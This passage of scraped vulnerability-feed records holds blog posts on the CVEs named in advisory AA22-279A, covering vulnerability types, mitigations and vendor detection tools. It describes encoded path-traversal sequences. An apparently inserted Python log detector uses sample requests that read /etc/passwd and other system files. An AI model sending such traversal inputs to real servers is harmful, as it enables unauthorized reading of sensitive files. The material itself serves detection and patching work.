CVE-2021-26857 Remote Code Execution\n 18. Microsoft CVE-2021-26858 Remote Code Execution\n 19. 
Microsoft CVE-2021-27065 Remote Code Execution\n 20. Apache HTTP Server CVE-2021-41773 Path Traversal\n\nOf course, I did not deny myself the pleasure of using this list of CVEs as input for my [Vulristics vulnerability prioritization tool](<https://github.com/leonov-av/vulristics>). Just to see how Vulristics handles it and tweak Vulristics if needed.\n\nHere is the command I used to generate the report:\n \n \n $ python3.8 vulristics.py --report-type \"cve_list\" --cve-project-name \"AA22-279A\" --cve-list-path joint_cves.txt --cve-data-sources \"ms,nvd,vulners,attackerkb\" --cve-comments-path comments.txt --rewrite-flag \"True\"\n\nThe full report is here: <https://avleonov.com/vulristics_reports/aa22-279a_report_with_comments_ext_img.html>\n\n## Vulnerable Products\n\nIf you look at the list of vulnerable software and hardware products, then some of them, obviously, should have been included in this advisory. Because lately there have been a lot of publications about how attackers exploit the vulnerabilities in these products:\n\n * Apache HTTP Server\n * Apache Log4j2\n * GitLab\n * Microsoft Exchange\n * Confluence Server\n * Zoho ManageEngine ADSelfService Plus\n * Pulse Connect Secure\n\nThe second group of products. For them, there were also publications about attacks. But it seems that these are more niche products and are less perceived as targets for attackers:\n\n * BIG-IP\n * Citrix Application Delivery Controller\n * VMware vCenter\n * Cisco HyperFlex HX\n\nAnd finally, there are quite exotic products that apparently reflect the specifics of American IT:\n\n * Sitecore Experience Platform (XP)\n * Hikvision Web Server\n * Apache APISIX\n * Buffalo WSR\n\n## Criticality of Vulnerabilities\n\nVulristics has identified all vulnerabilities as vulnerabilities of the highest criticality level (Urgent). 
Vulristics found public exploits for all vulnerabilities.\n\nAt the same time, if you look at CVSS, then there is this:\n\nAll vulnerabilities: 20 \nCritical: 16 \nHigh: 4 \nMedium: 0 \nLow: 0\n\nSo if you are using CVSS for prioritization, don't forget about the High level vulnerabilities.\n\n## Detected Types of Vulnerabilities\n\n * Remote Code Execution\n * Command Injection\n * Arbitrary File Reading\n * Authentication Bypass\n * Path Traversal\n\nAs we can see, all vulnerabilities are obviously critical except for one "Path Traversal":\n\nPath Traversal - Citrix Application Delivery Controller (CVE-2019-19781)\n\nThe description of the vulnerability leaves no room for detecting another type:\n\n"An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal".\n\nThe same type is indicated in the advisory AA22-279A: Citrix ADC CVE-2019-19781 Path Traversal\n\nAnd only [in the description of the exploit](<https://github.com/trustedsec/cve-2019-19781>) we can see that this is in fact RCE: "This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for **remote code execution**."\n\nWell, this is another reminder to us that we should not do hard filtering by vulnerability type. It's also not a good idea to trust the description from NVD. The type of vulnerability may change over time, and no one will make changes to the description in NVD.\n\nIn some cases, Vulristics can help to more accurately determine the type of vulnerability:\n\nAA22-279A: Apache HTTP Server CVE-2021-41773 Path Traversal \nVulristics: Remote Code Execution - Apache HTTP Server (CVE-2021-41773)\n\nWhy? 
Because we can read in the description: "If CGI scripts are also enabled for these aliased pathes, this could allow for **remote code execution**."\n\nBut of course Vulristics is not a silver bullet. It is difficult to come up with something here other than manual analysis of publications about vulnerabilities and exploits.\n\nI also cannot help but point out that for some of the vulnerabilities, Vulristics determined the types of vulnerabilities more correctly in accordance with the description:\n\nAA22-279A: GitLab CE/EE CVE-2021-22205 Remote Code Execution \nVulristics: Command Injection - GitLab (CVE-2021-22205) - Urgent [947] \n"\u2026 which resulted in a **remote command execution**."\n\nAA22-279A: Sitecore XP CVE-2021-42237 Remote Code Execution \nVulristics: Command Injection - Sitecore Experience Platform (XP) (CVE-2021-42237) \n"\u2026 it is possible to achieve **remote command execution** on the machine."\n\nAA22-279A: VMware vCenter Server CVE-2021-22005 Arbitrary File Upload \nVulristics: Remote Code Execution - VMware vCenter (CVE-2021-22005) \n"\u2026may exploit this issue **to execute code** on vCenter Server by uploading a specially crafted file."\n\nAA22-279A: F5 Big-IP CVE-2022-1388 Remote Code Execution \nVulristics: Authentication Bypass - BIG-IP (CVE-2022-1388) \n\u2026 undisclosed requests **may bypass** iControl REST **authentication**"\n\nAA22-279A: Apache HTTP Server CVE-2021-41773 Path Traversal \nVulristics: Remote Code Execution - Apache HTTP Server (CVE-2021-41773) \n"\u2026 this could allow for **remote code execution**."\n\nAA22-279A: Apache CVE-2022-24112 Authentication Bypass by Spoofing \nVulristics: Remote Code Execution - Apache APISIX (CVE-2022-24112) \n"\u2026 is vulnerable to **remote code execution**."\n\nAA22-279A: Buffalo WSR CVE-2021-20090 Relative Path Traversal \nVulristics: Authentication Bypass - Buffalo WSR (CVE-2021-20090) \n"\u2026 allow unauthenticated remote attackers to **bypass authentication**."\n\nTherefore, 
do not rush to trust the vulnerability type from the [CISA Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and take it into account when prioritizing vulnerabilities.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-21T20:10:13", "type": "avleonov", "title": "Joint Advisory AA22-279A and Vulristics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-21T20:10:13", "id": "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246", "href": "https://avleonov.com/2022/10/21/joint-advisory-aa22-279a-and-vulristics/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-10-14T00:05:09", 
"description": "In [a joint cybersecurity advisory](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3181261/nsa-cisa-fbi-reveal-top-cves-exploited-by-chinese-state-sponsored-actors/>), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have revealed the top CVEs used by state-sponsored threat actors from China.\n\nThe advisory aims to \"inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\"\n\nThe US and other allied nations consider China a cyber threat as it continues to target and attack companies in the US and elsewhere, with the primary aim of stealing intellectual property or gaining access to sensitive networks. The usual targets range from organizations in the IT sector, including telecommunications service providers; the [DIB (Defense Industrial Base)](<https://www.cisa.gov/defense-industrial-base-sector>) sector, which is related to military weapons systems; and other critical infrastructure sectors.\n\nIt is no surprise, then, that a majority of the CVEs revealed are for flaws allowing actors to surreptitiously and unlawfully gain access to networks. Within these networks, they establish persistence and move laterally to other connected systems.\n\nThe advisory is part of a concerted effort by US government agencies, particularly CISA, to push companies into getting on top of their patching. 
Part of that is getting them to patch much faster, and the other is getting them to focus on patching the vulnerabilities that threat actors are known to use.\n\nLast year, CISA [began publishing a catalog of actively exploited vulnerabilities](<https://www.malwarebytes.com/blog/news/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities>) that must be patched within two weeks on federal information systems. The agencies behind this latest advisory have also collaborated in the past on a list of [vulnerabilities favored by Russian state-sponsored threat actors](<https://www.malwarebytes.com/blog/news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities>).\n\nIf your organization's intellectual property is likely to be of interest to China, this list is for you. And if it isn't, this list is still worth paying attention to.\n\n## The vulnerabilities\n\n### Remote code execution (RCE)\n\nRCE flaws let an attacker execute code of their choosing on a remote system over the network, which is why they head this list. 
The advisory identifies 12 RCEs: [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (also known as [Log4Shell or LogJam](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>)), [CVE-2021-22205](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>), [CVE-2022-26134](<https://www.malwarebytes.com/blog/news/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited>), [CVE-2021-26855](<https://www.malwarebytes.com/blog/news/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi>), [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>), [CVE-2021-26084](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>), [CVE-2022-1388](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>), [CVE-2021-40539](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26857](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26858](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>), and [CVE-2021-27065](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>).\n\n### Arbitrary file read and arbitrary file upload\n\nThe advisory lists one arbitrary file read flaw, [CVE-2019-11510](<https://www.malwarebytes.com/blog/business/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind>), which lets an unauthenticated attacker read any file on a vulnerable Pulse Connect Secure appliance, and one arbitrary file upload flaw, 
[CVE-2021-22005](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>) in VMware vCenter Server, which the advisory's table classifies as file upload rather than file read: anyone with network access to the vCenter server can upload a file and turn that into code execution. File read is useful for stealing data, including the credentials and session material that unlock further access; file upload is usually a stepping stone to RCE.\n\n### Authentication bypass by spoofing\n\n[CVE-2022-24112](<https://nvd.nist.gov/vuln/detail/CVE-2022-24112>) is an authentication bypass flaw that allows attackers to reach resources they should not have access to by spoofing the client IP address that an allow-list check trusts.\n\n### Command injection\n\n[CVE-2021-36260](<https://www.malwarebytes.com/blog/news/2022/08/thousands-of-hikvision-video-cameras-remain-unpatched-and-vulnerable-to-takeover>) is a command injection flaw in the web server of affected Hikvision cameras that allows an unauthenticated attacker to execute commands of their own choosing on the device.\n\n### Command line execution\n\n[CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) is a command injection flaw in the web-based management interface of Cisco HyperFlex HX that allows an unauthenticated, remote attacker to inject arbitrary commands that run on the underlying operating system.\n\n### Path Traversal\n\nAlso known as \"directory traversal,\" these flaws allow attackers to read, and possibly write to, restricted files by inputting path traversal sequences like `../` into file or directory paths. The sequence need not appear literally: percent-encoded variants such as `.%2e/` (the form used against the Apache HTTP Server flaw below) or double-encoded `%252e%252e/` can slip past a check that runs before the server has fully decoded the path. 
[CVE-2019-19781](<https://www.malwarebytes.com/blog/news/2021/06/atomic-research-institute-breached-via-vpn-vulnerability>), [CVE-2021-41773](<https://www.malwarebytes.com/blog/news/2021/10/apache-http>), and [CVE-2021-20090](<https://www.malwarebytes.com/blog/news/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago>) are all path traversal flaws.\n\n## Mitigations\n\nThe NSA, CISA, and FBI urge organizations to undertake the following mitigations:\n\n * Apply patches as they come, prioritizing the most critical flaws in your environment.\n * Use multi-factor authentication.\n * Require the use of strong, unique passwords.\n * Upgrade or replace software or devices that are at, or close to, their end of life.\n * Consider adopting a [zero-trust security model](<https://www.malwarebytes.com/blog/news/2020/01/explained-the-strengths-and-weaknesses-of-the-zero-trust-model>).\n * Monitor and log Internet-facing systems for abnormal activity.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-13T16:15:00", "type": "malwarebytes", "title": "Chinese APT's favorite vulnerabilities revealed", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-13T16:15:00", "id": "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "href": "https://www.malwarebytes.com/blog/news/2022/10/psa-chinese-apts-target-flaws-that-take-full-control-of-systems", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-10-12T20:01:11", "description": "On October 6, 2022, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>) on the activity of cyber actors sponsored by the Chinese government, officially the People\u2019s Republic of China (PRC), in pursuit of its national interests. These malicious cyber activities attributed to the Chinese government have targeted, and continue to target, a mixture of industries and organizations in the United States. The advisory provides the top CVEs used since 2020 by PRC state-sponsored cyber actors as evaluated by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). PRC actors continue to exploit known vulnerabilities to target U.S. and allied networks and software and hardware companies, in order to steal intellectual property and develop access to sensitive networks. \n\nThe agencies describe PRC state-sponsored cyber activity as one of the most significant and dynamic threats to U.S. government and civilian networks. 
PRC state-sponsored cyber actors continue to target government and critical infrastructure networks with an increasing array of new and adaptive techniques, posing a considerable risk to the Information Technology Sector, telecommunications organizations, the Defense Industrial Base (DIB) Sector, and other critical infrastructure organizations. \n\nThey continue to exploit known vulnerabilities and use publicly available tools to target victims. Here is the list of 20 publicly known vulnerabilities (CVEs) published by the NSA, along with affected products and the associated Qualys VMDR QID(s) for each vulnerability: \n\n**Vendor** | **CVE** | **Vulnerability Type** | **Qualys QID(s)** \n---|---|---|--- \nApache Log4j | CVE-2021-44228 | Remote Code Execution | 730302, 150441, 150440, and more \nPulse Connect Secure | CVE-2019-11510 | Arbitrary File Read | 38771 \nGitLab CE/EE | CVE-2021-22205 | Remote Code Execution | 375475 \nAtlassian | CVE-2022-26134 | Remote Code Execution | 730514, 376657, 150523 \nMicrosoft Exchange | CVE-2021-26855 | Remote Code Execution | 50107, 50108 \nF5 Big-IP | CVE-2020-5902 | Remote Code Execution | 38791, 373106 \nVMware vCenter Server | CVE-2021-22005 | Arbitrary File Upload | 216265, 216266 \nCitrix ADC | CVE-2019-19781 | Path Traversal | 372685, 150273, 372305 \nCisco Hyperflex | CVE-2021-1497 | Command Line Execution | 730070 \nBuffalo WSR | CVE-2021-20090 | Relative Path Traversal | NA \nAtlassian Confluence Server and Data Center | CVE-2021-26084 | Remote Code Execution | 150368, 375839, 730172 \nHikvision Webserver | CVE-2021-36260 | Command Injection | NA \nSitecore XP | CVE-2021-42237 | Remote Code Execution | 14012 \nF5 Big-IP | CVE-2022-1388 | Remote Code Execution | 150511, 730489, 376577 \nApache | CVE-2022-24112 | Authentication Bypass by Spoofing | 730361 \nZOHO | CVE-2021-40539 | Remote Code Execution | 375840 \nMicrosoft | CVE-2021-26857 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-26858 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-27065 | Remote Code Execution | 50107 \nApache HTTP Server | CVE-2021-41773 | Path Traversal | 150373, 150372, 710595 and more \nTable 1: Top CVEs most used by Chinese state-sponsored cyber actors since 2020 \n\nNSA stated that the threat actors use virtual private networks (VPNs) to obscure their activities and establish initial access. Multiple CVEs in Table 1 let the actors stealthily gain unauthorized access to sensitive networks, after which they establish persistence and move laterally to other internally connected networks. \n\nThe NSA highlights how the PRC has targeted and compromised major telecommunications companies and network service providers, mostly by exploiting publicly known vulnerabilities. Affected networks have ranged from small office/home office (SOHO) routers to medium and large enterprise networks. \n\nPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Devices such as SOHO routers and Network Attached Storage (NAS) appliances serve as additional access points to route command and control (C2) traffic and as launch points for intrusions into other entities. Defenders, busy keeping pace with the frequent patching of Internet-facing services and endpoint devices, often overlook them. \n\n## Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0 \n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. 
You can search for these QIDs in [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), Vulnerabilities tab, by using the following QQL query: \n\n_vulnerabilities.vulnerability.cveIds: [CVE-2021-44228, CVE-2019-11510, CVE-2021-22205, CVE-2022-26134, CVE-2021-26855, CVE-2020-5902, CVE-2021-22005, CVE-2019-19781, CVE-2021-1497, CVE-2021-20090, CVE-2021-26084, CVE-2021-36260, CVE-2021-42237, CVE-2022-1388, CVE-2022-24112, CVE-2021-40539, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-41773]_ \n\n\n\nUsing [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), you can also prioritize these vulnerabilities using [Qualys TruRisk](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>) scoring.\n\n\n\n## Identify Vulnerable Assets using Qualys Threat Protection \n\nIn addition, you can locate vulnerable hosts through Qualys Threat Protection by simply clicking on the impacted hosts. This helps in identifying and tracking these vulnerabilities. \n\n\n\nUsing the Qualys Unified Dashboard, you can track impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment. \n\nRead the Article (Qualys Customer Portal): [NSA Top Exploited CVEs | China State Actors](<https://success.qualys.com/support/s/article/000007011>) \n\n\n\n## Recommendations & Mitigations \n\nThe NSA, CISA, and FBI recommend that U.S. and allied governments, critical infrastructure, and private sector organizations use the mitigation guidance provided to strengthen their defensive posture and decrease the threat of compromise from PRC state-sponsored cyber actors. 
\n\nHere is a summary of the mitigation guidance provided by the NSA: \n\n * Update, prioritize and patch vulnerable systems as soon as possible, starting with the CVEs listed in this article and in the [CISA KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) catalog. \n * Use phishing-resistant multi-factor authentication and require a unique, strong password for every account. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices. \n * Move toward a Zero Trust security model. \n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\nThe soundest way for organizations of any size to stay on top of these vulnerabilities and of end-of-life (EOL) network and device infrastructure, as the NSA's general mitigation guidance notes, is to keep an inventory of affected assets and apply patches as soon as possible. Qualys VMDR 2.0 makes this straightforward. You can start your [Qualys VMDR 2.0 trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect, and patch the high-priority commonly exploited vulnerabilities. 
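The mitigation list above ends with logging Internet-facing systems and watching the logs for anomalous activity, and the Malwarebytes write-up earlier on this page explains path traversal as feeding `../` sequences into file paths, with three of the advisory's twenty CVEs in that class. The Python below is an added example, not code from Qualys, Malwarebytes or the advisory: it scans access-log entries for traversal attempts and handles the two encodings that a plain `../` string match misses, a percent-encoded dot (`.%2e`, the shape used against the Apache HTTP Server flaw CVE-2021-41773) and double encoding (`%252e`). The log lines are constructed for the example and reduced to four fields so the parsing stays out of the way; the `/vpn/../vpns/` path mirrors the shape reported for CVE-2019-19781 and shows that a traversal can matter without ever leaving the web root, which is why the detector keys on the `..` segment rather than only on escaping the root.

```python
from urllib.parse import unquote

# Constructed sample access-log lines (not from the page), reduced to four
# whitespace-separated fields: client ip, method, the raw request path exactly
# as the server logged it, and the response status.
SAMPLE_LOG = [
    '203.0.113.7 GET /index.html 200',
    '203.0.113.7 GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd 200',
    '198.51.100.2 GET /images/..%252f..%252fwindows/win.ini 404',
    '198.51.100.9 GET /vpn/../vpns/cfg/smb.conf 200',
    '192.0.2.4 GET /docs/./guide/intro.html 200',
]


def decode_fully(path, max_rounds=3):
    '''Percent-decode until the path stops changing (bounded), so that %2e (a
    dot) and double-encoded %252f (a slash) are both unmasked before analysis.'''
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def normalize(path):
    '''Resolve . and .. segments the way a filesystem would and report whether
    any .. tried to climb above the document root. Assumes Unix-style
    separators (a Windows target would also need backslash treated as a slash).'''
    stack = []
    escaped_root = False
    for seg in path.split('/'):
        if seg in ('', '.'):
            continue
        if seg == '..':
            if stack:
                stack.pop()
            else:
                escaped_root = True
            continue
        stack.append(seg)
    return '/' + '/'.join(stack), escaped_root


def traversal_findings(lines):
    '''Return one finding per request whose decoded path contains a .. segment.
    escaped_root marks paths that climb above the root; double_encoded marks
    paths that only reveal the .. after a second decoding round, a strong
    signal on its own because legitimate clients have little reason to send it.'''
    findings = []
    for line in lines:
        client_ip, method, raw_path, status = line.split()
        once = unquote(raw_path)
        decoded = decode_fully(raw_path)
        if '..' not in decoded.split('/'):
            continue
        normalized, escaped_root = normalize(decoded)
        findings.append({
            'client_ip': client_ip,
            'method': method,
            'raw_path': raw_path,
            'normalized': normalized,
            'escaped_root': escaped_root,
            'double_encoded': once != decoded,
            'status': int(status),
        })
    return findings


if __name__ == '__main__':
    for finding in traversal_findings(SAMPLE_LOG):
        print(finding)
```

Run as a script it prints the three flagged requests: the Apache-style one normalizes to `/etc/passwd` and escapes the root, the double-encoded one escapes the root and is marked `double_encoded`, and the Citrix-style one stays inside the root but still carries a `..` segment. Decode before matching; a pattern applied to the raw path sees `.%2e` as harmless.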
\n\n## Contributors\n\n * Felix Jimenez Saez, Director, Product Management, Qualys\n * Swapnil Ahirrao, Principal Product Manager, VMDR, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-07T20:03:01", "type": "qualysblog", "title": "NSA Alert: Topmost CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-07T20:03:01", "id": "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial 
today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), \"Reducing the Significant Risk of Known Exploited Vulnerabilities.\" [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) requires urgent, prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate them.\n\nThe directive requires agencies to review and update their internal vulnerability management procedures within 60 days and to remediate each vulnerability according to the timelines outlined in CISA's vulnerability catalog.\n\nQualys helps customers identify and assess risk to their digital infrastructure and automate remediation. Qualys' guidance for rapid response to the directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. 
You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all of them carry the same priority. CISA has ordered U.S. federal agencies to apply patches as soon as possible, and its remediation deadlines fall into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) is already past due. These include some of the most significant exploits of the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 vulnerabilities (34%) need to be patched within the next two weeks, by **November 17, 2021**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months, by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. 
